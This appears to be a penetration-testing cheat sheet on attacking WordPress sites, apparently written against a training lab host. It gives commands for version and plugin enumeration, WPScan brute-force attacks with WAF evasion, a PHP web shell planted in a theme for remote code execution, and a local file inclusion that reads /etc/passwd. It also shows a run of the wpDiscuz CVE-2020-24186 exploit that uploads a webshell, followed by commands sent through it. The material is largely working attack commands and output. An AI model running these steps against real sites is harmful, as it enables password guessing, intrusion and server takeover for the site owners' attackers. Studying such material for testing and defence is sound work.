WordPress

101

WordPress Vulnerability Statistics

Directories

/wp-admin -> /wp-login.php

/wp-content/plugins/

/wp-content/themes/

Wordlists

wordpress.fuzz.txt

wp-plugins.fuzz.txt

wp-themes.fuzz.txt

Roles & Permissions

Administrator -> King 👑

Editor -> Post management + publish (for all users)

Author -> Post management + publish (owned posts)

Contributor -> Post management (owned posts)

Subscriber -> Browse posts, manage its own profile

Enumeration

# Version
curl -s example.com | grep '<meta name="generator"'

# Themes
curl -s example.com | grep themes

# Plugins
curl -s example.com | grep plugins

# Plugin version (requires Directory listing to be enabled)
curl -s example.com/wp-content/plugins/mail-masta/readme.txt | grep "Stable tag:"

WPScan is a free, Ruby-based WordPress security scanner that performs black-box testing to identify vulnerabilities in WordPress core, plugins, themes, and user configurations.

For vulnerability scanning get a token from WPScan.

# Update database
wpscan --update

# General enumeration
sudo wpscan --url example.com --enumerate --api-token <TOKEN>

# Modify agent for WAF evasion
sudo wpscan --url example.com --enumerate --api-token <TOKEN> --random-user-agent

Attacks

BFA

wp-login.php is the standard login form that accepts one login attempt per request. xmlrpc.php allows login via API calls and can bundle many attempts in one request, making brute-force faster. Even if wpscan outputs that XML-RPC is enabled, login-related methods may be blocked by plugins or server settings, so attacks through it can fail while wp-login attacks still work.

WPScan uses 2 kinds of BFA:

xmlrpc → uses WP's API to BF (xmlrpc.php) (faster)
wp-login → attempts to BF wp-login.php

# Enumerating users and brute-forcing
sudo wpscan --url example.com -e u --passwords password.lst

# Targeted BFA using xmlrpc
sudo wpscan --password-attack xmlrpc -t 20 --url http://example.com -U roger -P /usr/share/wordlists/rockyou

# Targeted BFA using wp-login
sudo wpscan --password-attack wp-login -t 20 --url http://example.com -U james -P cewl_tokens.txt

RCE

Modify an inactive theme (for avoiding breaking the site) by inserting a PHP web shell:

<?php system($_GET['c']); ?>

Interact with the shell via CLI.

curl http://example.com/wp-content/themes/twentytwenty/404.php?c=id

The same exact method can be done with Plugins:

Remeber to activate the plugin after: Plugins → Installed Plugins → Activate.

MSF's wp_admin_shell_upload module can be used:

# use module (make sure to set VHOST if needed)
msf6 > use exploit/unix/webapp/wp_admin_shell_upload

Vulnerabilities

No longer supported:

<?php 

include($_GET['pl']); # no validation/sanitization
global $wpdb;

$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");

echo $count[0]->co;

?>

$ curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...snip...

wpDiscuz is a plugin aimed to enhance commenting on page posts. Based on the version number (7.0.4), this exploit has a pretty good shot of getting us command execution via a file upload bypass.

wpDiscuz is intended only to allow image attachments. The file mime type functions could be bypassed, allowing an unauthenticated attacker to upload a malicious PHP file and gain remote code execution. The exploit script takes two parameters: -u the URL and -p the path to a valid post:

$ python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[102476] | code:[200]
[!] Got wmuSecurity value: 5c9398fcdb
[!] Got wmuSecurity value: 1 

[+] Generating random name for Webshell...
[!] Generated webshell name: uthsdkbywoxeebg

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url&quot;:&quot;http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php&quot; 

> id

[x] Failed to execute PHP code...

The exploit as written may fail, but we can use curl to interact with the uploaded webshell:

$ curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

GIF689a;

uid=33(www-data) gid=33(www-data) groups=33(www-data)

PreviousUmbraco NextCross-Origin

Last updated 10 days ago

Was this helpful?